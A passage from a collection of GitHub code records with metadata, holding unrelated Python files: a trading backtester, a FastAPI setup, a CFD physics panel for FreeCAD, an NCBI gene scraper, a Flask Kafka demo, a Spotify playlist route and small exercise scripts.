list_indicator,\n float_ratio\n):\n\n '''\n Backtester for either a long or short position.\n\n Long positions are tested with positive 'float_ratio'.\n\n Short positions are tested with negative 'float_ratio'.\n '''\n\n list_tsig = function_tsig(\n list_indicator = list_indicator\n )\n\n list_action = function_action(\n list_sign = list_tsig\n )\n\n list_alpha = []\n\n int_length = len(list_prices)\n\n for int_i in range(0, int_length):\n\n if list_action[int_i] == 1:\n\n list_alpha.append(1)\n float_inprice = list_prices[int_i]\n\n if list_action[int_i] == 0:\n\n if list_tsig[int_i] == 1:\n\n list_alpha.append(\n (float_inprice + (list_prices[int_i] - float_inprice) * float_ratio) / \n (float_inprice + (list_prices[int_i - 1] - float_inprice) * float_ratio)\n )\n\n if list_tsig[int_i] == 0:\n\n list_alpha.append(1)\n\n if list_action[int_i] == -1:\n\n list_alpha.append(\n (float_inprice + (list_prices[int_i] - float_inprice) * float_ratio) / \n (float_inprice + (list_prices[int_i - 1] - float_inprice) * float_ratio)\n )\n\n return list_alpha\n \n\n\n\ndef function_heikin_ashi_gen(\n list_values,\n float_initial,\n float_strength\n):\n\n list_output = [\n float_initial\n ]\n\n int_length = len(\n list_values\n )\n\n for int_i in range(0, int_length - 1):\n\n float_new_ha = list_output[int_i] * float_strength + list_values[int_i + 1] - list_values[int_i]\n\n list_output.append(\n float_new_ha\n )\n\n return list_output\n","repo_name":"Lepecin/wcs_bot_backtester_project","sub_path":"6th_week_v1/code/tb_custompack.py","file_name":"tb_custompack.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"37828583864","text":"\"\"\"Main app initialization.\"\"\"\nfrom fastapi import FastAPI\nfrom starlette.middleware.cors import CORSMiddleware\n\nfrom app.api import api_router\nfrom app.core.config import settings\nfrom app.db import database\n\n\napp = FastAPI(\n title=settings.project_name,\n openapi_url=f\"{settings.api_path}/openapi.json\",\n docs_url=f\"{settings.api_path}/docs/\",\n redoc_url=None,\n)\n\napp.state.database = database\n\n# Set all CORS enabled origins\nif settings.backend_cors_origins:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.backend_cors_origins],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\napp.include_router(api_router, prefix=settings.api_path)\n\n\n@app.on_event(\"startup\")\nasync def startup() -> None:\n \"\"\"Run actions on app startup.\n\n Ensure database is connected\n \"\"\"\n database_ = app.state.database\n if not database_.is_connected:\n await database_.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown() -> None:\n \"\"\"Run actions on app shutdown.\n\n Ensure database is disconnected\n \"\"\"\n database_ = app.state.database\n if database_.is_connected:\n await database_.disconnect()\n","repo_name":"dbatten5/cookiecutter-fastapi-react-psql","sub_path":"{{cookiecutter.project_name}}/backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"37226182571","text":"import os\r\nimport sqlite3\r\n\r\nlib = sqlite3.connect(os.path.join('database', 'data.db'))\r\n\r\ncursor = lib.cursor()\r\n\r\ncursor.execute(''' CREATE TABLE user_group (group_id text, alias text, authority integer) ''')\r\n\r\ncursor.execute(\"INSERT INTO user_group VALUES ('250253824', 'nsfz_acg', 2)\")\r\n\r\nlib.commit()\r\nlib.close()","repo_name":"Ntimesp/AkinaChann","sub_path":"database/init_group_db.py","file_name":"init_group_db.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1354889961","text":"total = int(input())\ndict1 = dict()\nfor i in range(total):\n input_data = input().split(\" \")\n if(dict1.get(input_data[0],0) != 0):\n dict1[input_data[0]] += 1\n else:\n dict1[input_data[0]] = 1\nlist1 = list(dict1.items())\nfor i in range(len(list1) - 1,0,-1):\n for ii in range(0,i):\n if(list1[ii][0][0] > list1[ii + 1][0][0]):\n tmp = list1[ii]\n list1[ii] = list1[ii + 1]\n list1[ii + 1] = tmp\nfor i in list1:\n print(i[0],i[1])","repo_name":"explosion3975/CPE","sub_path":"UVA10420.py","file_name":"UVA10420.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22202901102","text":"import warnings; warnings.filterwarnings(\"ignore\")\nfrom tqdm import tqdm\nimport pandas as pd\nimport requests\nimport bs4\n# =============================================================================================== #\nncbi_link = \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esummary.fcgi?db=gene&id=\"\n# =============================================================================================== #\ngenelist_link = \"https://www.genenames.org/cgi-bin/download/custom?col=gd_app_sym&col=md_eg_id&status=Approved&status=Entry%20Withdrawn&hgnc_dbtag=on&limit=2000&order_by=gd_app_sym_sort&format=text&submit=submit\"\n# genelist_link = \"https://www.genenames.org/cgi-bin/download/custom?col=gd_app_sym&col=md_eg_id&status=Approved&status=Entry%20Withdrawn&hgnc_dbtag=on&order_by=gd_app_sym_sort&format=text&submit=submit\"\n# =============================================================================================== #\ndf_genelist = pd.read_csv(genelist_link, header=0, sep=\"\\t\", error_bad_lines=False)\n# =============================================================================================== #\ngenelist = df_genelist['NCBI Gene ID(supplied by NCBI)'].fillna(0).astype(int).tolist()\ngenelist = [x for x in genelist if str(x) != 'nan']\ngenelist = [x for x in genelist if str(x) != '0']\n# print(genelist)\n# =============================================================================================== #\nbs_data = []\nbs_error = []\n# =============================================================================================== #\nfor i in tqdm(genelist, desc='Progress: '):\n try:\n url_link = str(ncbi_link + str(i))\n r = requests.get(url_link)\n soup = bs4.BeautifulSoup(r.content, 'xml')\n name_bs = soup.find(\"Name\").text\n description_bs = soup.find(\"Description\").text\n species_bs = soup.find(\"ScientificName\").text\n aliases_bs = soup.find(\"OtherAliases\").text\n summary_bs = soup.find(\"Summary\").text\n #print(i, '\\t\\t\\t', name_bs, '\\t\\t\\t', species_bs, '\\t\\t\\t', description_bs)\n bs_data.append({'UID': i, 'ScientificName': species_bs, 'Description': description_bs,\n 'Name': name_bs, 'Summary': summary_bs})\n\n except AttributeError:\n bs_error.append({'UID': i, 'Error': 'Error'})\n bs_data.append({'UID': i, 'ScientificName': \"Error\", 'Description': \"Error\",\n 'Name': \"Error\",'Summary': \"Error\"})\n# =============================================================================================== #\ndf_bs = pd.DataFrame(data=bs_data, columns=['UID','ScientificName','Name','Description','Summary'])\ndf_bs.rename(columns={'Name':'GeneSymbol','Summary':'GeneSummary'}, inplace=True)\ndf_error = pd.DataFrame(data=bs_error, columns=['UID','Error'])\n# =============================================================================================== #\ndf_bs.to_csv('./OutputData/NCBI_Eutils_v03_output.csv', index=False, sep='\\t')\ndf_error.to_csv('./OutputData/NCBI_Eutils_v03_errorlog.csv', index=False, sep='\\t')\n# =============================================================================================== #","repo_name":"AlbertoBejarano/BioInformatics","sub_path":"NCBI_Eutils_v03.py","file_name":"NCBI_Eutils_v03.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18120422486","text":"l = [\"washington\", \"test\", \"key\", \"random\"]\n\n\n## Approach 1\nlong_str_len = len(max(l,key=len))\ntemp_l = []\n\nfor i in range(len(l)):\n if len(l[i]) != long_str_len:\n diff = long_str_len - len(l[i])\n var = '*' * diff\n var = var + l[i]\n temp_l.append('|'.join(var))\n else:\n temp_l.append('|'.join(l[i]))\nfor row in temp_l:\n print(row)\n\n\n## Approach 2\nmyArray = l\nmx = len(max(myArray, key= len ))\nmn = len(min(myArray,key = len))\ntemp_list = []\nfor i in myArray:\n if len(i)<=mx and len(i)>mn:\n temp_list.append(i)\n elif len(i)== mn:\n temp_list.append(i)\n break\nfor row in temp_list:\n print(\"|\".join(\"{:*>{mx}}\".format(row,mx=mx)))\n\n\n## One Liner Approach\n\nlong_str_len = len(max(l,key=len))\nmatrix = ['|'.join(('*' * (long_str_len - len(l[i]))) + l[i]) for i in range(len(l))]\nfor row in matrix:\n print(row)\n","repo_name":"devcoder007/Pad-and-Align-Python-Strin","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35587318793","text":"import tflearn\n\n\nclass LstmRnn:\n def __init__(self, char_idx, seq_max_len=25, checkpoint_path=None, default_seed=None):\n g = tflearn.input_data([None, seq_max_len, len(char_idx)])\n g = tflearn.lstm(g, 512, return_seq=True)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.lstm(g, 512, return_seq=True)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.lstm(g, 512)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.fully_connected(g, len(char_idx), activation='softmax')\n g = tflearn.regression(g, optimizer='adam', loss='categorical_crossentropy', learning_rate=0.001)\n\n self.model = tflearn.SequenceGenerator(\n g, dictionary=char_idx,\n clip_gradients=5.0,\n checkpoint_path=checkpoint_path\n )\n\n self.default_seed = default_seed if default_seed else \"life in the hood\"\n\n def train(self, data, params=dict()):\n \"\"\"\n by default run for one epochs over the training data in batches of 128\n \"\"\"\n epochs = 1 if not (\"epochs\" in params) else params[\"epochs\"]\n batch_size = 128 if not (\"batch_size\" in params) else params[\"batch_size\"]\n\n X = data[\"X\"]\n Y = data[\"Y\"]\n self.model.fit(\n X, Y,\n validation_set=0.1,\n batch_size=batch_size,\n n_epoch=epochs\n )\n\n def spit(self, include_meta_data=False, seq_len=200, temp=1.0, seed=None, meta_data=None):\n seed = seed if seed else self.default_seed\n output = \"\"\n if include_meta_data:\n if not meta_data:\n raise TypeError(\"model.spit() called with include_meta_data set to True, but no metadata provided\")\n\n output += self.model.generate(seq_len, temperature=temp, seq_seed=seed)\n return output\n\n def get_state(self):\n return self.model\n\n def load_state(self, model):\n self.model = model\n","repo_name":"animate-object/r-prime","sub_path":"app/src/core/models/lstm_rnn.py","file_name":"lstm_rnn.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27958355047","text":"import os\nimport os.path\nimport FreeCAD\nif FreeCAD.GuiUp:\n import FreeCADGui\nfrom CfdOF import CfdTools\nfrom CfdOF.CfdTools import getQuantity, setQuantity, storeIfChanged\n\n\nRANS_MODELS = ['kOmegaSST', 'kEpsilon', 'SpalartAllmaras', 'kOmegaSSTLM']\nDES_MODELS = ['kOmegaSSTDES', 'kOmegaSSTDDES', 'kOmegaSSTIDDES', 'SpalartAllmarasDES', 'SpalartAllmarasDDES',\n 'SpalartAllmarasIDDES']\nLES_MODELS = ['kEqn', 'Smagorinsky', 'WALE']\n\n\nclass TaskPanelCfdPhysicsSelection:\n def __init__(self, obj):\n FreeCADGui.Selection.clearSelection()\n self.sel_server = None\n self.obj = obj\n self.form = FreeCADGui.PySideUic.loadUi(os.path.join(CfdTools.getModulePath(), 'Gui', \"TaskPanelPhysics.ui\"))\n\n self.form.radioButtonSteady.toggled.connect(self.updateUI)\n self.form.radioButtonTransient.toggled.connect(self.updateUI)\n self.form.radioButtonSinglePhase.toggled.connect(self.updateUI)\n self.form.radioButtonFreeSurface.toggled.connect(self.updateUI)\n self.form.checkBoxIsothermal.stateChanged.connect(self.updateUI)\n self.form.viscousCheckBox.stateChanged.connect(self.updateUI)\n self.form.srfCheckBox.stateChanged.connect(self.updateUI)\n self.form.radioButtonLaminar.toggled.connect(self.updateUI)\n self.form.radioButtonRANS.toggled.connect(self.updateUI)\n self.form.radioButtonDES.toggled.connect(self.updateUI)\n self.form.radioButtonLES.toggled.connect(self.updateUI)\n\n self.load()\n\n def load(self):\n\n # Time\n if self.obj.Time == 'Steady':\n self.form.radioButtonSteady.toggle()\n elif self.obj.Time == 'Transient':\n self.form.radioButtonTransient.toggle()\n\n # Phase\n if self.obj.Phase == 'Single':\n self.form.radioButtonSinglePhase.toggle()\n elif self.obj.Phase == 'FreeSurface':\n self.form.radioButtonFreeSurface.toggle()\n\n # Flow\n self.form.checkBoxIsothermal.setChecked(self.obj.Flow == 'Isothermal')\n self.form.checkBoxHighMach.setChecked(self.obj.Flow == 'HighMachCompressible')\n\n # Turbulence\n if self.obj.Turbulence == 'Inviscid':\n self.form.viscousCheckBox.setChecked(False)\n self.form.radioButtonLaminar.toggle()\n if self.obj.Turbulence == 'Laminar':\n self.form.viscousCheckBox.setChecked(True)\n self.form.radioButtonLaminar.toggle()\n elif self.obj.Turbulence == 'RANS':\n self.form.viscousCheckBox.setChecked(True)\n self.form.radioButtonRANS.toggle()\n elif self.obj.Turbulence == 'DES':\n self.form.viscousCheckBox.setChecked(True)\n self.form.radioButtonDES.toggle()\n elif self.obj.Turbulence == 'LES':\n self.form.viscousCheckBox.setChecked(True)\n self.form.radioButtonLES.toggle()\n\n # Gravity\n setQuantity(self.form.gx, self.obj.gx)\n setQuantity(self.form.gy, self.obj.gy)\n setQuantity(self.form.gz, self.obj.gz)\n\n # SRF model\n self.form.srfCheckBox.setChecked(self.obj.SRFModelEnabled)\n\n setQuantity(self.form.inputSRFCoRx, self.obj.SRFModelCoR.x)\n setQuantity(self.form.inputSRFCoRy, self.obj.SRFModelCoR.y)\n setQuantity(self.form.inputSRFCoRz, self.obj.SRFModelCoR.z)\n\n setQuantity(self.form.inputSRFAxisx, self.obj.SRFModelAxis.x)\n setQuantity(self.form.inputSRFAxisy, self.obj.SRFModelAxis.y)\n setQuantity(self.form.inputSRFAxisz, self.obj.SRFModelAxis.z)\n\n setQuantity(self.form.inputSRFRPM, self.obj.SRFModelRPM)\n\n self.updateUI()\n\n def updateUI(self):\n self.form.TimeFrame.setVisible(True)\n self.form.FlowFrame.setVisible(True)\n self.form.turbulenceFrame.setVisible(True)\n\n # Steady / transient\n if self.form.radioButtonSteady.isChecked():\n self.form.radioButtonFreeSurface.setEnabled(False)\n if self.form.radioButtonDES.isChecked() or self.form.radioButtonLES.isChecked():\n self.form.radioButtonRANS.toggle()\n self.form.radioButtonDES.setEnabled(False)\n self.form.radioButtonLES.setEnabled(False)\n if self.form.radioButtonFreeSurface.isChecked():\n self.form.radioButtonSinglePhase.toggle()\n else:\n self.form.radioButtonFreeSurface.setEnabled(True)\n self.form.radioButtonDES.setEnabled(True)\n self.form.radioButtonLES.setEnabled(True)\n\n # Gravity\n self.form.gravityFrame.setEnabled(\n self.form.radioButtonFreeSurface.isChecked() or\n (not self.form.checkBoxIsothermal.isChecked() and not self.form.checkBoxHighMach.isChecked()))\n\n # SRF model\n srf_capable = (self.form.radioButtonSteady.isChecked() and self.form.checkBoxIsothermal.isChecked())\n srf_should_be_unchecked = ((not self.form.checkBoxIsothermal.isChecked()) \n or self.form.radioButtonTransient.isChecked()\n or self.form.radioButtonFreeSurface.isChecked())\n self.form.srfCheckBox.setEnabled(srf_capable)\n if srf_should_be_unchecked:\n self.form.srfCheckBox.setChecked(False)\n self.form.srfFrame.setEnabled(self.form.srfCheckBox.isChecked())\n\n # Free surface\n if self.form.radioButtonFreeSurface.isChecked():\n self.form.checkBoxIsothermal.setChecked(True)\n self.form.checkBoxIsothermal.setEnabled(False)\n else:\n self.form.checkBoxIsothermal.setEnabled(True)\n\n # High Mach capability\n self.form.checkBoxHighMach.setEnabled(not self.form.checkBoxIsothermal.isChecked())\n if self.form.checkBoxIsothermal.isChecked():\n self.form.checkBoxHighMach.setChecked(False)\n\n # Viscous \n if self.form.viscousCheckBox.isChecked():\n self.form.turbulenceFrame.setVisible(True)\n # RANS\n if self.form.radioButtonRANS.isChecked():\n self.form.turbulenceComboBox.clear()\n self.form.turbulenceComboBox.addItems(RANS_MODELS)\n ti = CfdTools.indexOrDefault(RANS_MODELS, self.obj.TurbulenceModel, 0)\n self.form.turbulenceComboBox.setCurrentIndex(ti)\n self.form.turbulenceModelFrame.setVisible(True)\n #DES\n elif self.form.radioButtonDES.isChecked():\n self.form.turbulenceComboBox.clear()\n self.form.turbulenceComboBox.addItems(DES_MODELS)\n ti = CfdTools.indexOrDefault(DES_MODELS, self.obj.TurbulenceModel, 0)\n self.form.turbulenceComboBox.setCurrentIndex(ti)\n self.form.turbulenceModelFrame.setVisible(True)\n # LES\n elif self.form.radioButtonLES.isChecked():\n self.form.turbulenceComboBox.clear()\n self.form.turbulenceComboBox.addItems(LES_MODELS)\n ti = CfdTools.indexOrDefault(LES_MODELS, self.obj.TurbulenceModel, 0)\n self.form.turbulenceComboBox.setCurrentIndex(ti)\n self.form.turbulenceModelFrame.setVisible(True)\n else:\n self.form.turbulenceModelFrame.setVisible(False)\n self.form.turbulenceComboBox.clear()\n else:\n self.form.turbulenceFrame.setVisible(False)\n self.form.turbulenceModelFrame.setVisible(False)\n\n def accept(self):\n doc = FreeCADGui.getDocument(self.obj.Document)\n doc.resetEdit()\n\n if self.form.radioButtonSteady.isChecked():\n storeIfChanged(self.obj, 'Time', 'Steady')\n elif self.form.radioButtonTransient.isChecked():\n storeIfChanged(self.obj, 'Time', 'Transient')\n\n if self.form.radioButtonSinglePhase.isChecked():\n storeIfChanged(self.obj, 'Phase', 'Single')\n elif self.form.radioButtonFreeSurface.isChecked():\n storeIfChanged(self.obj, 'Phase', 'FreeSurface')\n\n if self.form.checkBoxIsothermal.isChecked():\n storeIfChanged(self.obj, 'Flow', 'Isothermal')\n elif not self.form.checkBoxIsothermal.isChecked():\n if self.form.checkBoxHighMach.isChecked():\n storeIfChanged(self.obj, 'Flow', 'HighMachCompressible')\n else:\n storeIfChanged(self.obj, 'Flow', 'NonIsothermal')\n\n if self.form.viscousCheckBox.isChecked():\n if self.form.radioButtonLaminar.isChecked():\n storeIfChanged(self.obj, 'Turbulence', 'Laminar')\n else:\n if self.form.radioButtonRANS.isChecked():\n storeIfChanged(self.obj, 'Turbulence', 'RANS')\n elif self.form.radioButtonDES.isChecked():\n storeIfChanged(self.obj, 'Turbulence', 'DES')\n elif self.form.radioButtonLES.isChecked():\n storeIfChanged(self.obj, 'Turbulence', 'LES')\n storeIfChanged(self.obj, 'TurbulenceModel', self.form.turbulenceComboBox.currentText())\n else:\n storeIfChanged(self.obj, 'Turbulence', 'Inviscid')\n\n storeIfChanged(self.obj, 'gx', getQuantity(self.form.gx))\n storeIfChanged(self.obj, 'gy', getQuantity(self.form.gy))\n storeIfChanged(self.obj, 'gz', getQuantity(self.form.gz))\n\n if self.form.srfCheckBox.isChecked():\n storeIfChanged(self.obj, 'SRFModelEnabled', self.form.srfCheckBox.isChecked())\n storeIfChanged(self.obj, 'SRFModelRPM', self.form.inputSRFRPM.text())\n centre_of_rotation = FreeCAD.Vector(\n self.form.inputSRFCoRx.property(\"quantity\").Value,\n self.form.inputSRFCoRy.property(\"quantity\").Value,\n self.form.inputSRFCoRz.property(\"quantity\").Value)\n storeIfChanged(self.obj, 'SRFModelCoR', centre_of_rotation)\n model_axis = FreeCAD.Vector(\n self.form.inputSRFAxisx.property(\"quantity\").Value,\n self.form.inputSRFAxisy.property(\"quantity\").Value,\n self.form.inputSRFAxisz.property(\"quantity\").Value)\n storeIfChanged(self.obj, 'SRFModelAxis', model_axis)\n\n def reject(self):\n doc = FreeCADGui.getDocument(self.obj.Document)\n doc.resetEdit()\n\n def closing(self):\n # We call this from unsetEdit to allow cleanup\n return","repo_name":"jaheyns/CfdOF","sub_path":"CfdOF/Solve/TaskPanelCfdPhysicsSelection.py","file_name":"TaskPanelCfdPhysicsSelection.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","stars":408,"dataset":"github-code","pt":"6"} +{"seq_id":"28544966105","text":"from data.config import __EMBED_COLOUR__\nfrom time import time\n\n\nasync def ct(cmd, message, args, timers, Embed):\n embed = Embed(\n title=\"Timers\", description=\"\", colour=__EMBED_COLOUR__)\n if timers != []:\n for timer in timers:\n # structure of timer: [still, time, userid, type]\n still = timer[0]\n time_left = int(timer[1] - time())\n user = timer[2]\n type = timer[3]\n embed.add_field(\n name=f\"Still: {still} - {type} - Started by {user}\", value=f\"Time Left: {time_left}\", inline=False)\n\n else:\n embed.add_field(\n name=\"No timers\", value=\"There are no timers currently active\", inline=False)\n\n await message.channel.send(embed=embed)\n return\n","repo_name":"TheJamieP/moonshiner-bot","sub_path":"commands/checktimers.py","file_name":"checktimers.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30414890014","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 4 11:48:14 2023\r\n\r\n@author: krishna\r\n\"\"\"\r\nfrom flask import Flask, request, redirect\r\nimport subprocess, sys, os\r\nfrom flask import Flask, render_template_string\r\n\r\ncwd = os.getcwd()\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n '''\r\n routing func to display the home page\r\n\r\n Returns\r\n -------\r\n html : string\r\n html home page.\r\n\r\n '''\r\n # Create the HTML for the page\r\n html = \"\"\"
\r\n

Hello, i am Groot!
\\\r\n
This is a demo project on kafka and python !
\r\n
Thanks and Regards,\\\r\n
Groot Yadav

\r\n
\r\n \\t \"\"\"\r\n \r\n return html\r\n\r\n\t\r\n@app.route('/kafkaProducer', methods=['POST'])\r\ndef kafkaProducer():\r\n '''\r\n func to call kafka producer over subprocess\r\n\r\n Returns\r\n -------\r\n html : string\r\n renders output from subprocess python call.\r\n\r\n '''\r\n # Run the external Python script and capture its output\r\n try:\r\n output = subprocess.check_output(['python', 'kafka_senti_producer.py','producer']).decode(\"utf-8\")\r\n except subprocess.CalledProcessError as error:\r\n print(\"Error in kafka producer endpoint func\")\r\n print (error.output.decode(\"utf-8\"))\r\n output = error.output.decode(\"utf-8\")\r\n\r\n # Create the HTML for the page\r\n html = \"\"\r\n html += \"\"\r\n \r\n html += ''\r\n html += \"
\"\r\n \r\n return html\r\n\t\r\n\t\r\n\r\n@app.route('/kafkaConsumer', methods=['POST'])\r\ndef kafkaConsumer():\r\n '''\r\n Func to call kafka consumer python sub process\r\n performs sentiment analysis on batch\r\n and saves output charts\r\n\r\n Returns\r\n -------\r\n html : string\r\n renders output of kafka consumer process.\r\n\r\n '''\r\n # Run the external Python script and capture its output\r\n try:\r\n output = subprocess.check_output(['python', 'kafka_senti_consumer.py', 'consumer']).decode(\"utf-8\")\r\n except subprocess.CalledProcessError as error:\r\n output = error.output.decode(\"utf-8\")\r\n\r\n # Create the HTML for the page\r\n html = \"
\"\r\n html += \"\"\r\n html += ''\r\n html += \"
\"\r\n \r\n return html\r\n\r\n@app.route('/sentimentOutput', methods=['POST'])\r\ndef sentimentOutput():\r\n '''\r\n func to render results\r\n for sentiment analysis\r\n\r\n Returns\r\n -------\r\n TYPE\r\n DESCRIPTION.\r\n\r\n '''\r\n # create html for the page\r\n html = \"Kafka Sentiment Analysis output

Sentiment Pie chart

\"\r\n filename = \"pieplot.png\"\r\n html += f'\"{filename}\"
'\r\n\r\n exp_dict = {'neg':'Negative words', 'pos':'Positive words', 'neu':'Neutral words'}\r\n for filename in [ \"wordcloud_neg.png\", \"wordcloud_pos.png\", \"wordcloud_neu.png\"]:\r\n #html += f'\"{filename}\"'\r\n html += \"

Word Cloud - {}

\".format(exp_dict[filename.split(\".\")[0].split(\"_\")[-1]])\r\n html += f'\"{filename}\"
'\r\n\r\n \r\n html += ''\r\n html += \"\"\r\n \r\n return render_template_string(html)\r\n\r\n\r\n\r\n@app.route(\"/go_home\", methods=['POST'])\r\ndef go_home():\r\n return redirect(\"/\")\r\n\r\nif __name__ == '__main__':\r\n app.run(host='localhost', port=5000)\r\n","repo_name":"thestarguy/KafkaBasicsAndSentimentAnalysis","sub_path":"Flask_demoApp.py","file_name":"Flask_demoApp.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26053679030","text":"from itertools import permutations\n\n\ncount = 0\nfor i in list(permutations(\"ТИКТОК\")):\n for j in range(1, len(i) - 1):\n if i[j] == i[j - 1] or i[j] == i[j + 1]:\n break\n else:\n count += 1\n break\n\nprint(count)\n","repo_name":"Woolfer0097/UGE_IT","sub_path":"8 task/211.py","file_name":"211.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6591200964","text":"import os\nimport evy.spotify\n\nfrom flask import session, redirect, url_for, render_template, request, send_file, current_app, Response\nfrom . import main\n\n@main.route('/')\ndef index():\n \"\"\"Renders the landing page\n\n Returns:\n str: HTML output\n \"\"\"\n\n return render_template('index.html')\n\n@main.route('/do', methods = [\"GET\", \"POST\"])\ndef do():\n if request.method == \"POST\":\n if not \"bpm\" in request.form:\n return \"Malformed POST request.\"\n \n # Save BPM\n session[\"bpm\"] = request.form[\"bpm\"]\n elif request.method == \"GET\":\n if not \"bpm\" in session:\n return \"Malformed session.\"\n \n cache_handler, auth_manager = evy.spotify.get_auth(session)\n\n if request.args.get(\"code\"):\n # Step 2. Being redirected from Spotify auth page\n auth_manager.get_access_token(request.args.get(\"code\"))\n return redirect('/do')\n\n if not auth_manager.validate_token(cache_handler.get_cached_token()):\n # Step 1. Display sign in link when no token\n auth_url = auth_manager.get_authorize_url()\n return redirect(auth_url)\n\n # Step 3. Signed in, display data\n sp = evy.spotify.create_spotipy(auth_manager)\n \n # Create playlist\n playlist_url, track_count = evy.spotify.create_playlist(sp, session[\"bpm\"])\n\n max_songs = evy.spotify.MAX_TRACKS\n\n return render_template('do.html', playlist_url=playlist_url,\n track_count=track_count, bpm=session[\"bpm\"], max_songs=max_songs)\n\n@main.route('/privacy')\ndef privacy():\n return render_template('privacy.html')","repo_name":"AntheSevenants/evy","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7212362196","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport Formats\r\n\r\nclass Stats:\r\n def empirical_cumulative_distribution(self, series: pd.Series):\r\n n = len(series)\r\n x = np.sort(series)\r\n y = np.arange(1, n+1) / n\r\n return x, y\r\n\r\n def correlational_coefficient(self, series1: pd.Series, series2: pd.Series):\r\n correlational_coefficient = np.corrcoef(series1, series2)[0,1]\r\n print(correlational_coefficient)\r\n\r\n def check_for_normal_distribution(self, series_to_check: pd.Series()):\r\n #obtain mean and std\r\n mean = np.mean(series_to_check)\r\n std_deviation = np.std(series_to_check)\r\n\r\n # Sample out of a normal distribution\r\n samples = np.random.normal(mean, std_deviation, 10000)\r\n\r\n # Get the CDF of the samples and of the data\r\n x_theor, y_theor = Stats.ecdf(samples)\r\n x_actual, y_actual = Stats.ecdf(series_to_check)\r\n\r\n # Plot the CDFs and show the plot\r\n _ = plt.plot(x_theor, y_theor)\r\n _ = plt.plot(x_actual, y_actual, marker='.', linestyle='none')\r\n _ = plt.xlabel(series_to_check.name)\r\n _ = plt.ylabel('CDF')\r\n _ = plt.title('Check for Normal Distribution')\r\n plt.show()\r\n\r\n def univariate(df, columns_to_test: list): \r\n df_results = pd.DataFrame()\r\n for col in columns_to_test:\r\n \r\n #obtain stats\r\n median = np.median(df[col]); median = Formats.currency(median)\r\n mean = np.mean(df[col]); mean = Formats.currency(mean)\r\n variance = np.var(df[col]); variance = Formats.currency(variance)\r\n standard_deviation = np.std(df[col]); standard_deviation= Formats.currency(standard_deviation)\r\n \r\n #create df\r\n df_to_append = pd.DataFrame.from_dict({'column': col, 'median': [median], 'mean':[mean], 'standard deviation': standard_deviation})\r\n df_results = pd.concat([df_results, df_to_append], ignore_index=True)\r\n print(df_results)\r\n\r\n def bivariate(series1: str, series2: str):\r\n \r\n name = series1.name + ' vs ' + series2.name\r\n print(name)\r\n covariance = np.cov(series1, series2)[0,1]\r\n correlational_coefficient = np.corrcoef(series1, series2)\r\n print(correlational_coefficient)\r\n print(correlational_coefficient[0,1])\r\n dct = {'covariance': [covariance], 'correlational coefficient': [correlational_coefficient]}\r\n\r\n df_results = pd.DataFrame.from_dict(dct)\r\n\r\n print(df_results)","repo_name":"Sburi/CustomPythonEnv","sub_path":"Stats.py","file_name":"Stats.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21345226839","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 1 06:40:51 2022\r\n\r\n@author: lbush\r\n\r\n\"\"\"\r\n\r\naaList = []\r\naa = \"Phe, Val, Asn, Gln, His, Leu, Cys, Gly, Ser\"\r\n\r\naaList = aa.split(', ')\r\n\r\nprint(aaList)\r\nprint(\"\\n\")\r\n\r\nlength = len(aaList)\r\nprint(f\"The length of the polypeptide is {length} amino acids long\\n\")\r\n\r\naaList.append(\"His\")\r\nprint(aaList)\r\n\r\n\r\n# create an inversion\r\n# Create an inversion: get two positions in the sequence \r\n# from the user and invert the sequence of the amino acids between them\")\r\n\r\nuserInput1 = int(input(\"Please enter the start position of the inversion: \"))\r\nuserInput2 = int(input(\"Please enter the end position of the inversion: \"))\r\n\r\ninput1 = userInput1-1\r\ninput2 = userInput2\r\n\r\n# create a variable named lstSec to store the segment\r\nlstSec = aaList[input1:input2]\r\n\r\n# print(lstSec)\r\n\r\n# arrange the partial list in reverse order\r\nlstSec.reverse()\r\n\r\nprint(\"Amino acid sequence prior to inversion: \\n\", aaList)\r\n\r\n# print(lstSec)\r\naaList[input1:input2] = 